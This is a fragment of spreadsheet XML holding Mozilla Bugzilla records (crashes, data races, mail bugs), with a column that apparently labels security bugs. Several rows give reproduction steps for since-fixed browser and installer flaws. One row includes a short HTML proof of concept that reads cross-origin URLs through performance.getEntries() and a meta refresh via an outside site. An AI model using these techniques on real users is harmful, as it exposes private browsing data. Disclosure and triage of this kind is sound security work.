      </c>
      <c r="G3382" t="n">
        <v>3</v>
      </c>
      <c r="H3382" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3382" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3382" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K3382" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L3382" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3382" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3382" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3382" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3382" t="inlineStr">
        <is>
          <t>[adv-main53.0.2+][adv-esr52.1.1+]</t>
        </is>
      </c>
      <c r="Q3382" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3382" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3382" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3382" t="n">
        <v>1</v>
      </c>
      <c r="U3382" t="n">
        <v>0</v>
      </c>
      <c r="V3382" t="n">
        <v>47</v>
      </c>
      <c r="W3382" t="inlineStr">
        <is>
          <t>Windows 7 32bit show a EXCEPTION_ACCESS_VIOLATION_READ crash rated high exploitable on 
https://sketchfab.com/models/7346263a68554cb3b536a872d5868374
https://sketchfab.com/models/9958172a6fd74610922a3a5fcb3e0850
Both Windows 7 and 10 32bit also show OOM crashes so you may need to work at it to get the actual Angle crash.
I also see the following on 32bit Windows.
Assertion failure: !err, at c:/builds/moz2_slave/m-beta-w32-d-00000000000000000/build/src/dom/canvas/WebGLContextDraw.cpp:739
The stacks for the assertions are short, symbol-less and pretty useless.
Nightly/53 Linux 64bit showed a nullptr crash
Operating system: Linux
                  0.0.0 Linux 4.8.15-300.fc25.x86_64 #1 SMP Thu Dec 15 23:10:23 UTC 2016 x86_64
CPU: amd64
     family 6 model 45 stepping 2
     2 CPUs
GPU: UNKNOWN
Crash reason:  SIGSEGV
Crash address: 0x0
Process uptime: not available
Thread 0 (crashed)
 0  libxul.so!mozilla::WebGLTexture::TexImage [WebGLTextureUpload.cpp:45f796204c54 : 1303 + 0x24]
    rax = 0x0000000000000000   rdx = 0x0000000000000000
    rcx = 0x0000000000000b40   rbx = 0x00007f050f1d0000
    rsi = 0x00007f0546f43730   rdi = 0x00007f0538bc5b8a
    rbp = 0x00007ffca2ceae00   rsp = 0x00007ffca2cead50
     r8 = 0x00007f0546f43730    r9 = 0x00007f0548020740
    r10 = 0x0000000000000073   r11 = 0x0000000000000000
    r12 = 0x00007f050f1c9c80   r13 = 0x00007ffca2ceafb5
    r14 = 0x00007ffca2cead88   r15 = 0x00007f050f1935a8
    rip = 0x00007f05368aac97</t>
        </is>
      </c>
      <c r="X3382" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3383">
      <c r="A3383" t="n">
        <v>1309310</v>
      </c>
      <c r="B3383" t="inlineStr">
        <is>
          <t>2016-10-11 11:16:06 -0700</t>
        </is>
      </c>
      <c r="C3383" t="inlineStr">
        <is>
          <t>Unlinkable content-privileged about: pages can link to chrome-privileged about: pages</t>
        </is>
      </c>
      <c r="D3383" t="inlineStr">
        <is>
          <t>2024-05-30 09:22:27 -0700</t>
        </is>
      </c>
      <c r="E3383" t="n">
        <v>1</v>
      </c>
      <c r="F3383" t="n">
        <v>1</v>
      </c>
      <c r="G3383" t="n">
        <v>3</v>
      </c>
      <c r="H3383" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3383" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3383" t="inlineStr">
        <is>
          <t>Security: CAPS</t>
        </is>
      </c>
      <c r="K3383" t="inlineStr">
        <is>
          <t>48 Branch</t>
        </is>
      </c>
      <c r="L3383" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3383" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3383" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3383" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3383" t="inlineStr">
        <is>
          <t>[adv-main51+]</t>
        </is>
      </c>
      <c r="Q3383" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3383" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3383" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3383" t="n">
        <v>1</v>
      </c>
      <c r="U3383" t="n">
        <v>0</v>
      </c>
      <c r="V3383" t="n">
        <v>28</v>
      </c>
      <c r="W3383" t="inlineStr">
        <is>
          <t>As per summary. This also allows loading, say, about:preferences in an iframe on about:feeds or about:reader or whatever. Compartments save our butt from immediate pwnage, but I'm fairly sure that chrome-privileged things in non-toplevel documents is bad either way.
This is a regression (it wasn't possible in 47), probably from bug 1253673. Not marking for now because we don't know for sure and I don't yet know exactly how bad this is. Just that it's bad.</t>
        </is>
      </c>
      <c r="X3383" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3384">
      <c r="A3384" t="n">
        <v>547920</v>
      </c>
      <c r="B3384" t="inlineStr">
        <is>
          <t>2010-02-22 23:38:28 -0800</t>
        </is>
      </c>
      <c r="C3384" t="inlineStr">
        <is>
          <t>Add "fuzzy" parameter to the uptake API call</t>
        </is>
      </c>
      <c r="D3384" t="inlineStr">
        <is>
          <t>2010-02-24 06:28:57 -0800</t>
        </is>
      </c>
      <c r="E3384" t="n">
        <v>1</v>
      </c>
      <c r="F3384" t="n">
        <v>1</v>
      </c>
      <c r="G3384" t="n">
        <v>4</v>
      </c>
      <c r="H3384" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3384" t="inlineStr">
        <is>
          <t>Webtools</t>
        </is>
      </c>
      <c r="J3384" t="inlineStr">
        <is>
          <t>Bouncer</t>
        </is>
      </c>
      <c r="K3384" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3384" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3384" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3384" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3384" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3384" t="inlineStr"/>
      <c r="Q3384" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3384" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3384" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3384" t="n">
        <v>1</v>
      </c>
      <c r="U3384" t="n">
        <v>0</v>
      </c>
      <c r="V3384" t="n">
        <v>2</v>
      </c>
      <c r="W3384" t="inlineStr">
        <is>
          <t>From bug 545642 comment 1:
&gt; 1. Uptake API. The response XML uses capitalized product naming and case
&gt; insensitive. 
&gt; https://tuxedo.stage.mozilla.com/api/uptake/?product=firefox-3.6rc1-complete
&gt; returns an XML with &lt;product&gt;Firefox-3.6rc1-Complete&lt;/product&gt;
&gt; I suspect legacy stuff, but it looks inconsistent a bit and will require extra
&gt; string conversion steps for API clients.
=&gt; Add a "fuzzy" parameter to the uptake call like it exists for the other ones, and disable it by default.</t>
        </is>
      </c>
      <c r="X3384" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3385">
      <c r="A3385" t="n">
        <v>770478</v>
      </c>
      <c r="B3385" t="inlineStr">
        <is>
          <t>2012-07-03 05:44:51 -0700</t>
        </is>
      </c>
      <c r="C3385" t="inlineStr">
        <is>
          <t>Installer runs untrusted program</t>
        </is>
      </c>
      <c r="D3385" t="inlineStr">
        <is>
          <t>2012-11-09 18:58:08 -0800</t>
        </is>
      </c>
      <c r="E3385" t="n">
        <v>1</v>
      </c>
      <c r="F3385" t="n">
        <v>1</v>
      </c>
      <c r="G3385" t="n">
        <v>2</v>
      </c>
      <c r="H3385" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3385" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3385" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K3385" t="inlineStr">
        <is>
          <t>13 Branch</t>
        </is>
      </c>
      <c r="L3385" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3385" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N3385" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3385" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3385" t="inlineStr">
        <is>
          <t>[advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3385" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3385" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3385" t="inlineStr">
        <is>
          <t>Firefox 16</t>
        </is>
      </c>
      <c r="T3385" t="n">
        <v>1</v>
      </c>
      <c r="U3385" t="n">
        <v>0</v>
      </c>
      <c r="V3385" t="n">
        <v>27</v>
      </c>
      <c r="W3385" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1
Build ID: 20120614114901
Steps to reproduce:
1. Put program named of the "program.exe" in "C:\".
2. Start installing through installer of Firefox. (Select standard install.)
3. Launch Firefox from "launched Firefox now".
4. But "program.exe" in "C:\" is run.
Actual results:
The program named of "program.exe" in ":C\" is run.
Expected results:
Firefox should be run.
FYI, also installer of Thunderbird has this problem.</t>
        </is>
      </c>
      <c r="X3385" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3386">
      <c r="A3386" t="n">
        <v>781850</v>
      </c>
      <c r="B3386" t="inlineStr">
        <is>
          <t>2012-08-10 09:51:37 -0700</t>
        </is>
      </c>
      <c r="C3386" t="inlineStr">
        <is>
          <t>[SECURITY] Do not leak the existence of groups when using User.get()</t>
        </is>
      </c>
      <c r="D3386" t="inlineStr">
        <is>
          <t>2012-11-14 04:30:19 -0800</t>
        </is>
      </c>
      <c r="E3386" t="n">
        <v>1</v>
      </c>
      <c r="F3386" t="n">
        <v>1</v>
      </c>
      <c r="G3386" t="n">
        <v>4</v>
      </c>
      <c r="H3386" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3386" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3386" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K3386" t="inlineStr">
        <is>
          <t>3.7.1</t>
        </is>
      </c>
      <c r="L3386" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3386" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3386" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3386" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3386" t="inlineStr"/>
      <c r="Q3386" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3386" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3386" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T3386" t="n">
        <v>1</v>
      </c>
      <c r="U3386" t="n">
        <v>0</v>
      </c>
      <c r="V3386" t="n">
        <v>15</v>
      </c>
      <c r="W3386" t="inlineStr">
        <is>
          <t>I just realized that User.get becomes way too verbose in Bugzilla 4.4. With a powerless account, I can access personal information, some of which power users shouldn't have access to either (even with admin or editusers privs):
- (confidential) groups a user belongs to, bug 548198 (Bugzilla 4.0!)
- unshared saved searches, bug 697224 (Bugzilla 4.4)
This is totally unacceptable and this information must only be disclosed if you are querying your own account, i.e. the user ID matches Bugzilla-&gt;user-&gt;id.
I know I approved bug 697224, but I didn't realize that all users could have access to this information. I clearly withdraw my approval here.
Said differently, saved searches should never be disclosed to anyone but you. From the UI, admins have no way to get this information, except by impersonating the user account, in which case the user is informed by email that someone is looking at his account. So there is no reason that someone can have access to this information using User.get, even for admins.
About groups, User.get is disclosing if a group exists or not, defeating CVE-2011-2380, see bug 653477. Bugzilla::Group-&gt;check_no_disclose() must be used instead of Bugzilla::Group-&gt;check().</t>
        </is>
      </c>
      <c r="X3386" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3387">
      <c r="A3387" t="n">
        <v>614002</v>
      </c>
      <c r="B3387" t="inlineStr">
        <is>
          <t>2010-11-22 10:24:43 -0800</t>
        </is>
      </c>
      <c r="C3387" t="inlineStr">
        <is>
          <t>Post-login destination</t>
        </is>
      </c>
      <c r="D3387" t="inlineStr">
        <is>
          <t>2010-12-10 14:36:34 -0800</t>
        </is>
      </c>
      <c r="E3387" t="n">
        <v>1</v>
      </c>
      <c r="F3387" t="n">
        <v>1</v>
      </c>
      <c r="G3387" t="n">
        <v>5</v>
      </c>
      <c r="H3387" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3387" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J3387" t="inlineStr">
        <is>
          <t>Users and Groups</t>
        </is>
      </c>
      <c r="K3387" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3387" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3387" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3387" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3387" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3387" t="inlineStr"/>
      <c r="Q3387" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3387" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3387" t="inlineStr">
        <is>
          <t>2.4</t>
        </is>
      </c>
      <c r="T3387" t="n">
        <v>1</v>
      </c>
      <c r="U3387" t="n">
        <v>0</v>
      </c>
      <c r="V3387" t="n">
        <v>3</v>
      </c>
      <c r="W3387" t="inlineStr">
        <is>
          <t>We need a reliable and secure way to redirect users to a destination after logging in. If the parameter is missing, we should try to use the referrer (if it's an-on-site locale) and if that's missing or bad just go to /home/ for now.
* Should only accept relative URLs. (No redirecting to a 3rd party site.)
* Should work correctly. (Unlike tiki's login redirection.)</t>
        </is>
      </c>
      <c r="X3387" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3388">
      <c r="A3388" t="n">
        <v>290079</v>
      </c>
      <c r="B3388" t="inlineStr">
        <is>
          <t>2005-04-12 11:46:03 -0700</t>
        </is>
      </c>
      <c r="C3388" t="inlineStr">
        <is>
          <t>arbitrary code execution via sidebar (part 2)</t>
        </is>
      </c>
      <c r="D3388" t="inlineStr">
        <is>
          <t>2011-08-05 21:29:30 -0700</t>
        </is>
      </c>
      <c r="E3388" t="n">
        <v>1</v>
      </c>
      <c r="F3388" t="n">
        <v>1</v>
      </c>
      <c r="G3388" t="n">
        <v>2</v>
      </c>
      <c r="H3388" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3388" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3388" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3388" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3388" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3388" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3388" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3388" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3388" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q3388" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3388" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3388" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3388" t="n">
        <v>1</v>
      </c>
      <c r="U3388" t="n">
        <v>0</v>
      </c>
      <c r="V3388" t="n">
        <v>18</v>
      </c>
      <c r="W3388" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b2) Gecko/20050412
Firefox/1.0+
Sidebar allows an attacker to link to the privileged content (such as
about:config) and run arbitrary code on the content.
If anchor contains target="_search", all security checks are bypassed.
http://lxr.mozilla.org/mozilla/source/browser/base/content/browser.js#4687
Related: Bug 284627
Reproducible: Always
Steps to Reproduce:
1. Click links in order
Actual Results:  
about:plugins is loaded into Sidebar web panel. "browser.startup.homepage" will
be overwritten. Further attacks can be done successfully.
Expected Results:  
Link to the privileged content should be blocked.</t>
        </is>
      </c>
      <c r="X3388" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3389">
      <c r="A3389" t="n">
        <v>1468523</v>
      </c>
      <c r="B3389" t="inlineStr">
        <is>
          <t>2018-06-13 10:24:56 -0700</t>
        </is>
      </c>
      <c r="C3389" t="inlineStr">
        <is>
          <t>Stealing of URL cross-domain using performance.getEntries() once again, treat meta refresh channel as a redirect by setting result principal URL</t>
        </is>
      </c>
      <c r="D3389" t="inlineStr">
        <is>
          <t>2024-05-30 09:46:44 -0700</t>
        </is>
      </c>
      <c r="E3389" t="n">
        <v>1</v>
      </c>
      <c r="F3389" t="n">
        <v>1</v>
      </c>
      <c r="G3389" t="n">
        <v>3</v>
      </c>
      <c r="H3389" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3389" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3389" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K3389" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L3389" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3389" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3389" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3389" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3389" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main62+][adv-esr60.2+]</t>
        </is>
      </c>
      <c r="Q3389" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3389" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3389" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T3389" t="n">
        <v>1</v>
      </c>
      <c r="U3389" t="n">
        <v>0</v>
      </c>
      <c r="V3389" t="n">
        <v>66</v>
      </c>
      <c r="W3389" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Steps to reproduce:
IMO, the fix for the following issue is incomplete: https://bugzilla.mozilla.org/show_bug.cgi?id=1246956
We can still access to the Cross-Origin URL, which should be blocked.
This issue has been found in Microsoft Edge too.
Proof Of Concept:
redireg.html:
&lt;embed src="/con.html"&gt;
&lt;script&gt;
setTimeout(function(){alert(performance.getEntriesByType("resource")[1].name)},5000);
&lt;/script&gt;
&lt;meta http-equiv="refresh" content="6;url=http://pwning.click/histback.html"&gt;
&lt;b&gt;
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
Type anything into the address bar and press ENTER! 
&lt;br&gt;
&lt;br&gt;
&lt;br&gt;
Then I'll figure out your secret search!
&lt;/b&gt;
con.html:
&lt;meta http-equiv="refresh" content="0;url=https://www.bing.com/search?q=test"&gt;
histback.html:
&lt;Script&gt;
history.back();
&lt;/script&gt;
Test live on Microsoft Edge / Mozilla Firefox: http://pwning.click/redireg.html
While Microsoft Edge also allows to steal saved frame's history navigation through performance.getEntries() and embed tag, Mozilla Firefox only allows to access to Cross-Origin URL, but still this should not happen.
As this report involves Microsoft Edge's Cross-Origin URL access Vulnerability, please do not open this report publicly eventhough this is not considered as a Vulnerability or after problem is resolved.
Actual results:
Mozilla Firefox allows us to access Cross-Origin URL
Expected results:
Accessing to Cross-Origin URL should be not possible.</t>
        </is>
      </c>
      <c r="X3389" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3390">
      <c r="A3390" t="n">
        <v>1704227</v>
      </c>
      <c r="B3390" t="inlineStr">
        <is>
          <t>2021-04-09 17:25:50 -0700</t>
        </is>
      </c>
      <c r="C3390" t="inlineStr">
        <is>
          <t>ThreadSanitizer: data race [@ mozilla::layers::WebRenderBridgeParent::ClearResources] vs. [@ mozilla::layers::CompositorBridgeParent::GetCompositorBridgeParentFromWindowId]</t>
        </is>
      </c>
      <c r="D3390" t="inlineStr">
        <is>
          <t>2021-11-22 23:45:34 -0800</t>
        </is>
      </c>
      <c r="E3390" t="n">
        <v>1</v>
      </c>
      <c r="F3390" t="n">
        <v>1</v>
      </c>
      <c r="G3390" t="n">
        <v>3</v>
      </c>
      <c r="H3390" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3390" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3390" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K3390" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3390" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3390" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3390" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3390" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3390" t="inlineStr"/>
      <c r="Q3390" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3390" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3390" t="inlineStr">
        <is>
          <t>90 Branch</t>
        </is>
      </c>
      <c r="T3390" t="n">
        <v>1</v>
      </c>
      <c r="U3390" t="n">
        <v>0</v>
      </c>
      <c r="V3390" t="n">
        <v>16</v>
      </c>
      <c r="W3390" t="inlineStr">
        <is>
          <t>Created attachment 9214846
Detailed Crash Information
The attached crash information was detected by ThreadSanitizer while fuzzing build mozilla-central 20210409-7bc2dd06085f. Unfortunately a test case is not available.
### General information about TSan reports
#### Why fix races?
Data races are undefined behavior and can cause crashes as well as correctness issues. Compiler optimizations can cause racy code to have unpredictable and hard-to-reproduce behavior.
#### Rating
If you think this race can cause crashes or correctness issues, it would be great to rate the bug appropriately as P1/P2 and/or indicating this in the bug. This makes it a lot easier for us to assess the actual impact that these reports make and if they are helpful to you.
#### False Positives / Benign Races
Typically, races reported by TSan are not false positives [1], but it is possible that the race is benign. Even in this case it would be nice to come up with a fix if it is easily doable and does not regress performance. Every race that we cannot fix will have to remain on the suppression list and slows down the overall TSan performance. Also note that seemingly benign races can possibly be harmful (also depending on the compiler, optimizations and the architecture) [2][3].
[1] One major exception is the involvement of uninstrumented code from third-party libraries.
[2] http://software.intel.com/en-us/blogs/2013/01/06/benign-data-races-what-could-possibly-go-wrong
[3] How to miscompile programs with "benign" data races: https://www.usenix.org/legacy/events/hotpar11/tech/final_files/Boehm.pdf
#### Suppressing unfixable races
If the bug cannot be fixed, then a runtime suppression needs to be added in mozglue/build/TsanOptions.cpp. The suppressions match on the full stack, so it should be picked such that it is unique to this particular race. The bug number of this bug should also be included so we have some documentation on why this suppression was added.</t>
        </is>
      </c>
      <c r="X3390" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3391">
      <c r="A3391" t="n">
        <v>75228</v>
      </c>
      <c r="B3391" t="inlineStr">
        <is>
          <t>2001-04-09 09:49:41 -0700</t>
        </is>
      </c>
      <c r="C3391" t="inlineStr">
        <is>
          <t>Unable to send out message without a Subject</t>
        </is>
      </c>
      <c r="D3391" t="inlineStr">
        <is>
          <t>2008-07-31 01:23:50 -0700</t>
        </is>
      </c>
      <c r="E3391" t="n">
        <v>1</v>
      </c>
      <c r="F3391" t="n">
        <v>1</v>
      </c>
      <c r="G3391" t="n">
        <v>3</v>
      </c>
      <c r="H3391" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3391" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J3391" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K3391" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3391" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3391" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N3391" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3391" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3391" t="inlineStr">
        <is>
          <t>[nsbeta1+]</t>
        </is>
      </c>
      <c r="Q3391" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3391" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3391" t="inlineStr">
        <is>
          <t>mozilla0.9</t>
        </is>
      </c>
      <c r="T3391" t="n">
        <v>1</v>
      </c>
      <c r="U3391" t="n">
        <v>0</v>
      </c>
      <c r="V3391" t="n">
        <v>5</v>
      </c>
      <c r="W3391" t="inlineStr">
        <is>
          <t>**** observed with 2001-04-09 build ****
in today's build when the message has no Subject clicking Send has no effect.
Filling out the Subject field solves the problem</t>
        </is>
      </c>
      <c r="X3391" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3392">
      <c r="A3392" t="n">
        <v>894736</v>
      </c>
      <c r="B3392" t="inlineStr">
        <is>
          <t>2013-07-16 18:47:19 -0700</t>
        </is>
      </c>
      <c r="C3392" t="inlineStr">
        <is>
          <t>Under Linux, a script can read clipboard data when PRIMARY selection paste (with middle-click) is used</t>
        </is>
      </c>
      <c r="D3392" t="inlineStr">
        <is>
          <t>2014-02-21 09:50:21 -0800</t>
        </is>
      </c>
      <c r="E3392" t="n">
        <v>1</v>
      </c>
      <c r="F3392" t="n">
        <v>1</v>
      </c>
      <c r="G3392" t="n">
        <v>3</v>
      </c>
      <c r="H3392" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3392" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3392" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3392" t="inlineStr">
        <is>
          <t>22 Branch</t>
        </is>
      </c>
      <c r="L3392" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3392" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3392" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3392" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3392" t="inlineStr">
        <is>
          <t>[adv-main26+]</t>
        </is>
      </c>
      <c r="Q3392" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3392" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3392" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T3392" t="n">
        <v>1</v>
      </c>
      <c r="U3392" t="n">
        <v>2</v>
      </c>
      <c r="V3392" t="n">
        <v>28</v>
      </c>
      <c r="W3392" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:25.0) Gecko/20130715 Firefox/25.0 (Nightly/Aurora)
Build ID: 20130715100109
Steps to reproduce:
1. Open https://twitter.com/ and log in.
2. Open some other page in a new tab, e.g. https://bugzilla.mozilla.org/
3. From this page, selects some text, e.g. "Bugzilla@Mozilla", and type Ctrl-C to copy the text to the clipboard.
4. Select some other text, e.g. "Main Page".
5. Go back to the Twitter tab and click with the middle button in the "Compose new Tweet..." area.
Actual results:
"Bugzilla@Mozilla" is pasted.
Expected results:
"Main Page" should have been pasted, i.e. the contents of the PRIMARY selection, not the contents of the clipboard.
This is potentially a security problem, as the contents of the clipboard may not be intended to be made public, which can occur due to this bug if the user doesn't take care of what has really been pasted.
If the pasted contents are directly available to the web site (without further action such as clicking on the "Tweet" button), this would be even worse...</t>
        </is>
      </c>
      <c r="X3392" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3393">
      <c r="A3393" t="n">
        <v>1308922</v>
      </c>
      <c r="B3393" t="inlineStr">
        <is>
          <t>2016-10-10 06:37:31 -0700</t>
        </is>
      </c>
      <c r="C3393" t="inlineStr">
        <is>
          <t>heap-use-after-free in nsINode::ReplaceOrInsertBefore</t>
        </is>
      </c>
      <c r="D3393" t="inlineStr">
        <is>
